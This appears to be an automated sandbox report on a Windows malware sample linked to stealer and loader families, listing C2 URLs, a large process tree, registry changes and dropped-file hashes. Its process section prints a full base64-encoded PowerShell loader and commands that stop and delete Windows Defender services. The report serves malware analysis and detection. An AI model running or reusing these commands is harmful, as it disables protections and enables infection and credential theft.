(PID) Process(5868) MSBuild.exe
C2 (9)orjinalecza.net/lxaz
eczakozmetik.net/qop
medikalbitkisel.net/qos
medicalbitkisel.org/mbj
orijinalecza.net/kazd
tortoisgfe.top/paxk
pomelohgj.top/uiads
snakejh.top/adsk
medicalbitkisel.net/juj
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:15 04:50:32+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 14.16
CodeSize: 633856
InitializedDataSize: 326144
UninitializedDataSize: -
EntryPoint: 0x20577
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (British)
CharacterSet: Unicode
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
854
Monitored processes
707
Malicious processes
45
Suspicious processes
22

Behavior graph

Click at the process to see the details
start 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe no specs cmd.exe no specs conhost.exe no specs mshta.exe no specs schtasks.exe no specs powershell.exe conhost.exe no specs mshta.exe no specs powershell.exe conhost.exe no specs temp3nawocmq4kj4epax1vef2hyl6rjg83xq.exe #AMADEY ramez.exe 85ea4c301e.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs nircmd.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs nsudolg.exe no specs cmd.exe conhost.exe no specs cmd.exe conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs mode.com no specs cmd.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs tasklist.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs find.exe no specs nsudolg.exe no specs powershell.exe no specs conhost.exe no specs #GCLEANER fd88613613.exe reg.exe no specs find.exe no specs cmd.exe no specs findstr.exe no specs 7z.exe unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs sc.exe no specs find.exe no specs sc.exe no specs sc.exe no specs unlocker.exe cmd.exe no specs conhost.exe no specs sc.exe no specs iobitunlocker.exe no specs 08iyoof.exe no specs iobitunlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs #LUMMA msbuild.exe ramez.exe no specs #LUMMA svchost.exe j6j70wm.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs #LUMMA msbuild.exe taskkill.exe no specs sc.exe no specs sc.exe no specs 85ea4c301e.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs nircmd.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs nsudolg.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs mode.com no specs cmd.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs tasklist.exe no specs #GCLEANER ra02w4s.exe reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs findstr.exe no specs 7z.exe unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs sc.exe no specs sc.exe no specs d1oax1c.exe no specs #LUMMA msbuild.exe hgvm49v.exe msbuild.exe no specs msbuild.exe werfault.exe no specs slui.exe e5jg7mm.exe no specs rkm9tn0qyx.exe rkm9tn0qyx.tmp globalsynapse398.exe powershell.exe no specs conhost.exe no specs cbbb2df539.exe cbbb2df539.tmp info.exe conhost.exe no specs core.exe lljz7ek87y.exe msbuild.exe no specs msbuild.exe svchost.exe 170d24ef7b.exe werfault.exe no specs rps4jk5rutm.exe no specs msbuild.exe 8utfuxw5nw.exe 8utfuxw5nw.tmp werfault.exe no specs globalsynapse398.exe no specs powershell.exe no specs conhost.exe no specs #LUMMA 9876f7931b.exe 2wq3hmkquh.exe 31ivpco0n7.exe no specs 8b33ceb360.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs nircmd.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs nsudolg.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs mode.com no specs cmd.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs tasklist.exe no specs chrome.exe no specs reg.exe no specs reg.exe no specs powershell.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs findstr.exe no specs 7z.exe unlocker.exe no specs #CREDENTIALFLUSHER bfab5105ed.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs taskkill.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs chrome.exe no specs ramez.exe no specs sc.exe no specs sc.exe no specs chrome.exe chrome.exe no specs powershell.exe no specs csc.exe conhost.exe no specs 6a8a705c78.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs cvtres.exe no specs powershell.exe mshta.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs taskkill.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs csc.exe taskkill.exe no specs conhost.exe no specs cvtres.exe no specs #CREDENTIALFLUSHER firefox.exe no specs chrome.exe powershell.exe no specs firefox.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs temp4v29xkkurdt5crlvxw3sbrdqr5nwmasr.exe no specs temp4v29xkkurdt5crlvxw3sbrdqr5nwmasr.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs taskkill.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs taskkill.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs #CREDENTIALFLUSHER firefox.exe no specs firefox.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs chrome.exe no specs conhost.exe no specs firefox.exe no specs firefox.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs firefox.exe no specs chrome.exe no specs chrome.exe no specs firefox.exe no specs csc.exe csc.exe csc.exe csc.exe csc.exe cvtres.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs cvtres.exe no specs cvtres.exe no specs cvtres.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs firefox.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs csc.exe csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs firefox.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
132sc delete "WinDefend" C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
444reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f C:\Windows\System32\reg.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Registry Console Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
496C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JABhACAAPQAgADEAMgAwADYAOAA7ACQAYgAgAD0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABtAHAAQQAzADgAMAAuAHQAbQBwACcAOwAgACYAKAAgACQAcwBoAEUAbABsAGkAZABbADEAXQArACQAUwBIAEUATABsAEkARABbADEAMwBdACsAJwB4ACcAKQAoACAAbgBFAHcALQBvAEIAagBFAEMAVAAgACAAcwB5AHMAdABFAG0ALgBJAG8ALgBDAG8AbQBQAFIARQBTAHMASQBPAG4ALgBEAEUAZgBsAGEAVABlAHMAVABSAEUAYQBNACgAWwBpAE8ALgBtAGUATQBPAFIAeQBzAHQAUgBFAGEATQBdACAAWwBjAE8AbgB2AEUAcgB0AF0AOgA6AGYAcgBvAE0AQgBBAFMARQA2ADQAcwB0AHIAaQBuAEcAKAAnAHAAVgBUAFIAYgB0AG8AdwBGAEgAMgB2AHgARAA5ADQAaQBJAGQARQBNAHMAaQBqAGEASgBxAEsASQBwAFcARwBkAHEAdgBVAGEAaABWADAAVwB6AFgARQBnADAAbAB1AFMAVABUAEgAagBoAHkAbgBEAFMAdgA3ADkAOQAwAGsAWgBvAFUAdQBHADAAVgA3AGkAZQArAE4ANwBYAFAAdQA5AFQAbgAyAEsAQQB5ADcAdAA2AHMAVQBTAFAAVQBkAHcAMwAwAHMAWQB4AE0AcgBTAFUANwBiAHIAYQBNADgAaQArAFcAUwBUAEYAZQBaAGcAVwBSAEkAdAByAFAAZQBKAEoAYwBtAFQAcQBCADMASwBRADEAbwBsAFUANQBCAFAAOABRAEIAWgBNAFAAVwBVAFoAbwB2AFIAQgB5AFEAUQBQAEEAcwBJADMAZABQAEoARgBBAHkATQB5AFMAUABwAFMARQBqAGoAeABXAE0AcwBUADQAOQBLADQATQBCAFkAOQBTAHYALwA3AHkAbgA0AHkAcgBvAE0AMwBwAGUAQgBXADgAWgBJAHMAMwBHAFEAbAB3AG0AcQBkAEwARwBhAFgAOABIAEwAVQBFAGMAOQA5AHYAdQBQAEQAUABjAEkAQQBFAFUAeQBDAHcASgBGAG4AQgBqAE4AUABtAFUAZwByAHoAUgBDAGsAdgBJAG4ASQBxAHIAbwBBAHUAbABCAEYAbgBSAEsAdgB2AGgAdgBoAGEAdgAyAHUAVQBMAGwAYwBGAEgATABrAE0AQgBqAGkAVQBvAFgAbwAxAGcATgAzAHkASgB0AGMAbQA1AEcAQQBtAGgAZwB2AFAAaQBOAHcAeQAxAHcAYQBhAHcAZQB1AEQAMQBzAEQAaQBzAHoASwA4ADYATgBtAEMANwB2AG8AWgBFADYAVgBVAEQAegBXAEoAbABZAEQAWgAvAEoAbABLADUAVgBlAE4AQQBNAHQAcwBQADAAaABrAEkAVABHAE4ASABuADIAMwAwADMAMQB3AFgASQBzACsAaQBTAC8AUwBOAHoAbwBQAFMAagBUADQAUABJAHYAZwBYADQAYQBIAGkAKwBCAHEANABnAFEAbQBlAG0AWQBIAGIAQwBKAFAAdwA3AHcATABaAG4ARwArAEMAUgBUADAAUgBiAFAATABRAGYAWABhADkASgBhAHUAYQBtAE4AUgBHAFQARABjAEsAaABPADYAVAAzAFIARgA1ADIAMwBZAGQAcgBjAC8AVwAvAG4AcQA4AFAAcQBmADMAWABHAFIAQQAwAHgASQB2AHYAbgBjAGkAegA2AHYAWAA5ADcANwBoAEYAWABNADEAbQBCAHcAYgBxAE4AWQBNAEwAVgBEAGkAdgBYAEIAWgBSAEwAZQAyADAASwBvAEEATgArAHgAZABnAFYAeQBhAGkATABMAGkARwBPAC8AYQBtAGgAVgA5AEgARABBAGIATQBNAHUAVQA3AEQASQA5AGIAZABzAC8AYwBvAGMANwB6AEQAKwByAHAAdABTAFEANABMADQAMwBmADMAZwBpAG8AZwBsADEAcgBDAHIAYgB4AEEATgBXAGUAVQBHADUAZQA4AEQAeAB6AFMAbgBoAEgANABjAGwAZQBvAE8AOQBTAC8AegB3AFoAVgA4AGwAOAB1AE4AKwA1AEIASwB5ADIAVgBpAE4AVgBlADgASAB0AEMASQBZAHIAOABGAE4AdQAwAEkAdwBKAE4AagBOAHQAOAArADcARgBzAEUAYwBJAGsATAB6AEoASABhAEYAYwAxAGgAWgArADUAUgAwAHIANwBoAGMANQBuAHcASgB4AEoAOQBHAFgASwBlAHQAbwAwADcAbwB6AFgAdwBsAEgAMABDAGIAKwBjAG4ASgBoAFYAYgBKAEcAYwAvAGcAMwBXAEIAcQBOAEQANwBzAGoAdgBNAEIAVABCAGYAbgBEAGEAQQBBADMAUQBsAC8ASgBKADIARgA2ACsASwAxAHUAcwBQAFYARQAyAGQAVwBuAHYAbAB4AGYAOQA3AGgAdABCAFAAaQA3ADEAOAA9ACcAIAApACwAIABbAHMAeQBTAFQAZQBNAC4ASQBvAC4AQwBPAG0AUAByAGUAUwBzAGkATwBOAC4AYwBPAG0AcAByAGUAUwBTAGkATwBuAE0AbwBkAGUAXQA6ADoAZABFAEMAbwBtAHAAcgBlAFMAUwAgACkAfAAgACUAIAB7ACAAbgBFAHcALQBvAEIAagBFAEMAVAAgACAASQBPAC4AcwB0AFIAZQBhAG0AcgBlAGEAZABFAFIAKAAgACQAXwAsAFsAUwBZAFMAVABlAG0ALgBUAGUAeAB0AC4AZQBuAGMAbwBEAGkATgBHAF0AOgA6AEEAcwBjAGkASQAgACkAfQAgAHwAIAAlACAAewAkAF8ALgBSAGUAYQBEAFQATwBlAE4AZAAoACkAIAB9ACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
644sc config "WdNisSvc" start= disabled C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
668sc delete "MDCoreSvc" C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
728sc start WinDefend C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Exit code:
5
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
728"C:\Users\admin\AppData\Local\Temp\is-8EKEL.tmp\Rkm9TN0qYx.tmp" /SL5="$B0162,3248229,54272,C:\Users\admin\AppData\Roaming\PuZWeA\Rkm9TN0qYx.exe" C:\Users\admin\AppData\Local\Temp\is-8EKEL.tmp\Rkm9TN0qYx.tmp
Rkm9TN0qYx.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Setup/Uninstall
Version:
51.52.0.0
Modules
Images
c:\users\admin\appdata\local\temp\is-8ekel.tmp\rkm9tn0qyx.tmp
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
736C:\WINDOWS\system32\cmd.exe /c tasklistC:\Windows\System32\cmd.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
780sc stop "WinDefend" C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
812reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" /fC:\Windows\System32\reg.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Registry Console Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
Total events
218 344
Read events
218 027
Write events
170
Delete events
147

Modification events

(PID) Process:(7864) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7864) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7864) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(8168) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(8168) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(8168) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(8016) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(8016) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(8016) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(8016) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
Executable files
115
Suspicious files
183
Text files
204
Unknown types
0

Dropped files

PID
Process
Filename
Type
78162025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exeC:\Users\admin\AppData\Local\Temp\oJRqvxfzA.htahtml
MD5:B7BB2276311988631B7499094C5D00F8
SHA256:2403A2AE845250B373ED8231E196ACD4F62D5E2F4EEAD42C2DB10C26B4F14213
8016powershell.exeC:\Users\admin\AppData\Local\Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXEexecutable
MD5:26CC5A6CFD8E8ECC433337413C14CDDB
SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8
4880powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_g2qmyvvp.yei.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8016powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s2hl1goq.usm.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
572885ea4c301e.exeC:\Users\admin\AppData\Local\Temp\Work\7z.exeexecutable
MD5:426CCB645E50A3143811CFA0E42E2BA6
SHA256:CF878BFBD9ED93DC551AC038AFF8A8BBA4C935DDF8D48E62122BDDFDB3E08567
6724Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXEC:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exeexecutable
MD5:26CC5A6CFD8E8ECC433337413C14CDDB
SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8
6724Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXEC:\Windows\Tasks\ramez.jobbinary
MD5:879C42C14E034FF9CDEE62DAED661940
SHA256:9915374F0BD81180D791F1F06BEE8884AB40CA32AC3C1A2D75E63C266F2F98DB
8016powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
